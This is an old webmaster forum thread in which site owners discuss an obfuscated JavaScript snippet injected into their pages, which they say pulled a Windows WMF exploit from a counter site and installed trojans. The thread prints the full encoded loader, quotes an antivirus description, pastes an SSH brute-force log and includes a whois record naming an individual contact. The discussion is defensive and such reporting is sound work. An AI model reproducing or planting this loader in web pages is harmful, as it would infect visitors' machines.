Weird JavaScript suddenly on page [pls help]
 

uploaded a new index on dutchteenamateurs and suddenly this is on the site

<sc-ript language="JavaScript">
e = '0x00' + '5E';str1 = "%E5%BD%B6%AB%C1%AC%AD%A6%B5%BA%E2%FF%AB%B6%AC%B6% BF%B6%B5%B6%AD%A6%E7%B9%B6%BD%BD%BA%B3%FF%E3%E5%B6 %BB%AF%BE%B2%BA%C1%AC%AF%BC%E2%FF%B9%AD%AD%B1%E7%F 0%F0%AA%AC%BA%AF%AC%BC%B0%AA%B3%AD%BA%AF%F3%BC%B0% B2%F0%B3%AD%AF%BE%BB%F0%FF%C1%A8%B6%BD%AD%B9%E2%EE %C1%B9%BA%B6%B8%B9%AD%E2%EE%E3%E5%F0%B6%BB%AF%BE%B 2%BA%E3%E5%F0%BD%B6%AB%E3%C1%D2%D7";str=tmp='';for (i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCha rCode((tmp.charCodeAt(0)^e)-127);}document.write(str);
</sc-ript>

WTF is that? it asked for some counter to be installed never added it, gonna scan my PC right now :/

boinkboink

Haven't seen that one before ThinkX. looks similar to what code red was doing. did a virus scan find anything?

I had someone install a counter like that across all my domains just before xmas... had to get my host to do a mass replace :321GFY

Yep. That was a fun night! :error :error :error

Do you haver an idea who it was, or how he did it?

I'd like to know too... something new to bug my host about.

checking with bitdefender found 2 exploits on my c drive, checking every monday so these are new since yday. Love to know what it is as well, they managed to get through BD and Im only surfing in FF

it opened hxxp://userscounter.com/ntraf/animation.htm

ok tried to open it with BD

c:\......\temp\eqe6x21s.wmf

Exploit.Win32.WMF-PFV

Damn Dec28 that didnt take long :/

http://www.bitdefender.us/VIRUS-1736...2.WMF-PFV.html

Exploit.Win32.WMF-PFV
Virus Encyclopedia

Spreading: LOW Discovered : 2005 Dec 28
Damage: LOW
Size: 16 KB
FREE REMOVAL TOOL : N/A
SYMPTOMS:
Automatic worm or spyware installation, without confirmation.
TECHNICAL DESCRIPTION:
This is a WMF (Windows Meta-File) rendering exploit. The rendering bug that is exploited lies in the Windows Picture and Fax Viewer.

The WMF file could be placed on a web site that the victim visits and gets infected.

The exploit may create a shell on the victim computer, or may download and install a worm or a spyware trojan.

The exploits 'works' on Internet Explorer and some versions of Mozilla. However some browsers may display a confirmation dialog about it.

BitDefender detects this exploit as Exploit.Win32.WMF-PFV.
REMOVAL INTRUCTIONS:
Please let BitDefender delete detected files.
ANALIZED BY:
BitDefender AntiVirus Lab

your server might be hacked, i've seen that before.
check other html files if you see the same thing.

k found it

I got it through the chameleon window for tgp submission thats IE, some TGP submit page must have it too, it paste the exploit to html pages so the server isnt hacked (checked IP too it isnt)

thanks glad it isnt

offtopic : when are you gonna fix the chameleon submission error stating 3-4 characters minimum at the gallery url? been like that for at least 2 months

feck

Jan 3 07:48:18 rhonda sshd[16932]: Failed password for invalid user test from 168.131.82.129 port 39491 ssh2
Jan 3 07:48:22 rhonda sshd[16957]: Invalid user test from 168.131.82.129
Jan 3 07:48:22 rhonda sshd[16957]: error: Could not get shadow information for NOUSER
Jan 3 07:48:22 rhonda sshd[16957]: Failed password for invalid user test from 168.131.82.129 port 39649 ssh2
Jan 3 07:48:25 rhonda sshd[16982]: Invalid user test from 168.131.82.129
Jan 3 07:48:25 rhonda sshd[16982]: error: Could not get shadow information for NOUSER
Jan 3 07:48:25 rhonda sshd[16982]: Failed password for invalid user test from 168.131.82.129 port 39760 ssh2
Jan 3 07:48:29 rhonda sshd[17004]: Invalid user test from 168.131.82.129
Jan 3 07:48:29 rhonda sshd[17004]: error: Could not get shadow information for NOUSER
Jan 3 07:48:29 rhonda sshd[17004]: Failed password for invalid user test from 168.131.82.129 port 39866 ssh2
Jan 3 07:48:33 rhonda sshd[17024]: Invalid user test from 168.131.82.129
Jan 3 07:48:33 rhonda sshd[17024]: error: Could not get shadow information for NOUSER
Jan 3 07:48:33 rhonda sshd[17024]: Failed password for invalid user test from 168.131.82.129 port 39971 ssh2
Jan 3 07:48:37 rhonda sshd[17038]: Invalid user test from 168.131.82.129
Jan 3 07:48:37 rhonda sshd[17038]: error: Could not get shadow information for NOUSER
Jan 3 07:48:37 rhonda sshd[17038]: Failed password for invalid user test from 168.131.82.129 port 40083 ssh2
Jan 3 07:48:41 rhonda sshd[17057]: Invalid user test from 168.131.82.129
Jan 3 07:48:41 rhonda sshd[17057]: error: Could not get shadow information for NOUSER
Jan 3 07:48:41 rhonda sshd[17057]: Failed password for invalid user test from 168.131.82.129 port 40184 ssh2
Jan 3 07:48:45 rhonda sshd[17076]: Invalid user test from 168.131.82.129
Jan 3 07:48:45 rhonda sshd[17076]: error: Could not get shadow information for NOUSER
Jan 3 07:48:45 rhonda sshd[17076]: Failed password for invalid user test from 168.131.82.129 port 40302 ssh2
Jan 3 07:48:49 rhonda sshd[17107]: Invalid user tester from 168.131.82.129
Jan 3 07:48:49 rhonda sshd[17107]: error: Could not get shadow information for NOUSER
Jan 3 07:48:49 rhonda sshd[17107]: Failed password for invalid user tester from 168.131.82.129 port 40449 ssh2
Jan 3 07:48:53 rhonda sshd[17124]: Invalid user tester from 168.131.82.129
Jan 3 07:48:53 rhonda sshd[17124]: error: Could not get shadow information for NOUSER
Jan 3 07:48:53 rhonda sshd[17124]: Failed password for invalid user tester from 168.131.82.129 port 40555 ssh2
Jan 3 07:48:56 rhonda sshd[17142]: Invalid user tester from 168.131.82.129
Jan 3 07:48:56 rhonda sshd[17142]: error: Could not get shadow information for NOUSER
Jan 3 07:48:56 rhonda sshd[17142]: Failed password for invalid user tester from 168.131.82.129 port 40663 ssh2
Jan 3 07:49:00 rhonda sshd[17159]: Invalid user tester from 168.131.82.129
Jan 3 07:49:00 rhonda sshd[17159]: error: Could not get shadow information for NOUSER
Jan 3 07:49:00 rhonda sshd[17159]: Failed password for invalid user tester from 168.131.82.129 port 40773 ssh2
Jan 3 07:49:04 rhonda sshd[17180]: Invalid user tester from 168.131.82.129
Jan 3 07:49:04 rhonda sshd[17180]: error: Could not get shadow information for NOUSER
Jan 3 07:49:04 rhonda sshd[17180]: Failed password for invalid user tester from 168.131.82.129 port 40873 ssh2
Jan 3 07:49:07 rhonda sshd[17245]: Invalid user tester from 168.131.82.129
Jan 3 07:49:07 rhonda sshd[17245]: error: Could not get shadow information for NOUSER
Jan 3 07:49:07 rhonda sshd[17245]: Failed password for invalid user tester from 168.131.82.129 port 40981 ssh2
Jan 3 07:49:11 rhonda sshd[17261]: Invalid user tester from 168.131.82.129
Jan 3 07:49:11 rhonda sshd[17261]: error: Could not get shadow information for NOUSER
Jan 3 07:49:11 rhonda sshd[17261]: Failed password for invalid user tester from 168.131.82.129 port 41086 ssh2
Jan 3 07:49:17 rhonda sshd[17292]: Invalid user tester from 168.131.82.129
Jan 3 07:49:17 rhonda sshd[17292]: error: Could not get shadow information for NOUSER
Jan 3 07:49:17 rhonda sshd[17292]: Failed password for invalid user tester from 168.131.82.129 port 41190 ssh2
Jan 3 07:49:21 rhonda sshd[17318]: Invalid user tester from 168.131.82.129
Jan 3 07:49:21 rhonda sshd[17318]: error: Could not get shadow information for NOUSER
Jan 3 07:49:21 rhonda sshd[17318]: Failed password for invalid user tester from 168.131.82.129 port 41376 ssh2

Location: Korea-KR [City: Seoul, Kyonggi-Do]

ARIN says that this IP belongs to APNIC; I'm looking it up there.

APNIC says that this IP belongs to KRNIC; I'm looking it up there.



Çѱ¹ÀÎÅͳÝÁøÈï¿ø(NIDA)ÀÇ ÀÎÅͳÝÁ¤º¸¼¾ÅÍ(KRNIC)°¡ Á¦°øÇÏ´Â Whois ¼haºñ½º ÀÔ´Ï´Ù.

query: 168.131.82.129

# KOREAN

Á¶È¸°á°ú´Â ¾Æ·¡¿Í °°À¸¸ç, ½ÇÁ¦ Á¤º¸¿Í »óÀÌÇÒ ¼ö ÀÖ½À´Ï´Ù.

IPv4 ÁÖ¼Ò : 168.131.0.0-168.131.255.255
³×Æ®¿öÅ© À̸§ : CHONNAM-NET
ÇÒ´ç³»¿ª µî·ÏÀÏ : 20040625
ÇÒ´çÁ¤º¸°ø°³¿©ºÎ : Y

[ IPv4 »ç¿ë ±â°ü Á¤º¸ ]
±â°ü°íÀ¯¹øÈ£ : ORG384067
±â°ü¸í : Àü³²´ëÇб³
ÁÖ¼Ò : ±¤ÁÖ ºÏ±¸ ¿ëºÀµ¿
»ó¼¼ÁÖ¼Ò : 300¹øÁö Àü³²´ëÇб³ Á¤º¸Àü»ê¿ø
¿ìÆí ¹øÈ£ : 500-757

[ ³×Æ®¿öÅ© ´ã´çÀÚ Àι° Á¤º¸ ]
À̸§ : Á¶Àç¹Î
±â°ü¸í : Àü³²´ëÇб³
ÁÖ¼Ò : ±¤ÁÖ ºÏ±¸ ¿ëºÀµ¿
»ó¼¼ÁÖ¼Ò : 300¹øÁö Àü³²´ëÇб³ Á¤º¸Àü»ê¿ø
¿ìÆí ¹øÈ£ : 500-757
ÀüÈha ¹øÈ£ : +82-62-530-3684
ÀüÀÚ ¿ìÆí : ****@chonnam.ac.kr

Error?, could be a wrong setting by the webmaster.. Hit me up on icq, I would like to see that.

That's the piece of shit counter that loaded on me when I went to visit amacontent site.. I icq'd him to tell him about it.. it downloads trojans on users pc.. could thing I had norton on.. my IE6 got frozen, couldnt close windows & it used up resources like a motherfucker..

yeah its only in IE ive got 5 though, its gone now, update your AV cause mine didnt get it till today... it dl a trojan yes an exploit that pastes the JS code

More about this at: http://www.f-secure.com/weblog/

I am just wondering are MGP's getting less clicks to their movie
galleries now as this seems to be a major exploit. And what are
the MGP reviewers using to not get infected by this.

There is a temporary Non Micro$oft Patch at
http://www.hexblog.com/

thanks, yeah lotsa ppl wont know till they find out weeks later i think

DoubleBump

Very interesting thread, so everbody should read it to avoid that shit like this spreads any further!

They should not use IE at least. Not now, not ever :thumbsup

There is really good browser here I recommend: http://www.maxthon.com

I believe this exploit is browser independent. Anyway there is an
official micro$oft patch out as of today.

there is I know thanks :)